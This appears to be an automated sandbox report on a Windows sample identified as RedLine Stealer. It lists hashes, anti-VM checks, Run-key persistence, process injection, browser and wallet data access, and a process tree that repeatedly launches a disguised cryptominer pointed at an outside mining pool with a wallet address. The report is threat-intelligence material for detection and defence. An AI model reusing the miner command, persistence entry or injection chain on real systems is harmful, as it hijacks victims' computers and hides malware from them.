Analysis
-
max time kernel
161s -
max time network
169s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
21-01-2022 11:18
Static task
static1
Behavioral task
behavioral1
Sample
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
Resource
win10-en-20211208
General
-
Target
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
-
Size
879KB
-
MD5
b1145a56bbeb10cb56f9482e6f0beea9
-
SHA1
e6d21a807cf01dffd4d03f63d816a21e9739fd6f
-
SHA256
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8
-
SHA512
87d72557604d0d6c3ce163a54e43ae597f93556346d13acc5028bc4904c0ad823ded6b887b2e56c94dacbc297aacaf43be675c519f11550e1c48b6e31d43bfda
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/3688-118-0x0000000000A30000-0x0000000000B0C000-memory.dmp family_redline behavioral1/memory/3688-119-0x0000000000A30000-0x0000000000B0C000-memory.dmp family_redline behavioral1/memory/3688-124-0x0000000000A30000-0x0000000000B0C000-memory.dmp family_redline behavioral1/memory/3688-125-0x0000000000A30000-0x0000000000B0C000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
Processes:
fl.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exepid process 4348 fl.exe 1432 RegHost.exe 2696 RegHost.exe 4900 RegHost.exe 4948 RegHost.exe 2660 RegHost.exe 4536 RegHost.exe 2124 RegHost.exe 1032 RegHost.exe 3236 RegHost.exe 3404 RegHost.exe -
Processes:
resource yara_rule behavioral1/memory/3192-149-0x0000000140000000-0x000000014274C000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
RegHost.exeRegHost.exeRegHost.exeRegHost.exefl.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\fl.exe themida C:\Users\Admin\AppData\Local\Temp\fl.exe themida behavioral1/memory/4348-146-0x00007FF782200000-0x00007FF78263B000-memory.dmp themida behavioral1/memory/4348-147-0x00007FF782200000-0x00007FF78263B000-memory.dmp themida behavioral1/memory/4348-148-0x00007FF782200000-0x00007FF78263B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1432-154-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/1432-155-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/1432-156-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/2696-161-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/2696-162-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/2696-163-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/4900-168-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/4900-169-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/4900-170-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/4948-175-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/4948-176-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/4948-177-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/2660-182-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/2660-183-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/2660-184-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/4536-189-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/4536-190-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/4536-191-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/2124-196-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/2124-197-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/2124-198-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1032-203-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/1032-204-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/1032-205-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/3236-210-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/3236-211-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/3236-212-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/3404-217-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/3404-218-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida behavioral1/memory/3404-219-0x00007FF619400000-0x00007FF61983B000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
RegHost.exeRegHost.exefl.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" fl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
RegHost.exeRegHost.exefl.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exepid process 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe -
Suspicious use of SetThreadContext 22 IoCs
Processes:
fl.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription pid process target process PID 4348 set thread context of 3192 4348 fl.exe bfsvc.exe PID 4348 set thread context of 1060 4348 fl.exe explorer.exe PID 1432 set thread context of 1748 1432 RegHost.exe bfsvc.exe PID 1432 set thread context of 2064 1432 RegHost.exe explorer.exe PID 2696 set thread context of 4248 2696 RegHost.exe bfsvc.exe PID 2696 set thread context of 4792 2696 RegHost.exe explorer.exe PID 4900 set thread context of 3080 4900 RegHost.exe bfsvc.exe PID 4900 set thread context of 4832 4900 RegHost.exe explorer.exe PID 4948 set thread context of 5016 4948 RegHost.exe bfsvc.exe PID 4948 set thread context of 696 4948 RegHost.exe explorer.exe PID 2660 set thread context of 4916 2660 RegHost.exe bfsvc.exe PID 2660 set thread context of 2372 2660 RegHost.exe explorer.exe PID 4536 set thread context of 1704 4536 RegHost.exe bfsvc.exe PID 4536 set thread context of 1104 4536 RegHost.exe explorer.exe PID 2124 set thread context of 2036 2124 RegHost.exe bfsvc.exe PID 2124 set thread context of 2900 2124 RegHost.exe explorer.exe PID 1032 set thread context of 4232 1032 RegHost.exe bfsvc.exe PID 1032 set thread context of 3472 1032 RegHost.exe explorer.exe PID 3236 set thread context of 3960 3236 RegHost.exe bfsvc.exe PID 3236 set thread context of 4100 3236 RegHost.exe explorer.exe PID 3404 set thread context of 3852 3404 RegHost.exe bfsvc.exe PID 3404 set thread context of 3536 3404 RegHost.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exeexplorer.exeexplorer.exeexplorer.exepid process 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe 4792 explorer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exedescription pid process Token: SeDebugPrivilege 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exefl.exeexplorer.exeRegHost.exeexplorer.exeRegHost.exedescription pid process target process PID 3688 wrote to memory of 4348 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe fl.exe PID 3688 wrote to memory of 4348 3688 a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe fl.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 3192 4348 fl.exe bfsvc.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 4348 wrote to memory of 1060 4348 fl.exe explorer.exe PID 1060 wrote to memory of 1432 1060 explorer.exe RegHost.exe PID 1060 wrote to memory of 1432 1060 explorer.exe RegHost.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 1748 1432 RegHost.exe bfsvc.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 1432 wrote to memory of 2064 1432 RegHost.exe explorer.exe PID 2064 wrote to memory of 2696 2064 explorer.exe RegHost.exe PID 2064 wrote to memory of 2696 2064 explorer.exe RegHost.exe PID 2696 wrote to memory of 4248 2696 RegHost.exe bfsvc.exe PID 2696 wrote to memory of 4248 2696 RegHost.exe bfsvc.exe PID 2696 wrote to memory of 4248 2696 RegHost.exe bfsvc.exe PID 2696 wrote to memory of 4248 2696 RegHost.exe bfsvc.exe PID 2696 wrote to memory of 4248 2696 RegHost.exe bfsvc.exe PID 2696 wrote to memory of 4248 2696 RegHost.exe bfsvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe"C:\Users\Admin\AppData\Local\Temp\a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm5⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm7⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"9⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm11⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"11⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"12⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"13⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"14⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm15⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"15⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"16⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm17⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"17⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"18⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm19⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"19⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"20⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm21⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"21⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"22⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm23⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"23⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\fl.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
